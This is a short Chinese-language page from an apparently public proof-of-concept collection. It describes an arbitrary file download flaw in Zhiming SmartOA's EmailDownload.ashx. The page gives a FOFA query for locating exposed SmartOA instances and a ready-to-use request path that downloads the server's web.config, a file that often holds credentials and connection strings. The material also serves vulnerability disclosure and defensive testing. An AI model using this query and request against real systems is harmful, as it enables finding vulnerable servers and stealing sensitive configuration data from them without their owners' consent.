Awesome-POC/OA产品漏洞/智明 SmartOA EmailDownload.ashx 任意文件下载漏洞.md
2022-05-20 15:57:09 +08:00

633 B
Raw Blame History

智明 SmartOA EmailDownload.ashx 任意文件下载漏洞

漏洞描述

智明 SmartOA EmailDownload.ashx文件存在任意文件下载漏洞通过漏洞可下载服务器上的敏感文件查看敏感信息

漏洞影响

智明 SmartOA

FOFA

app="智明协同-SmartOA"

漏洞复现

登录页面

image-20220520133519986

验证POC

/file/EmailDownload.ashx?url=~/web.config&name=web.config

image-20220520133538762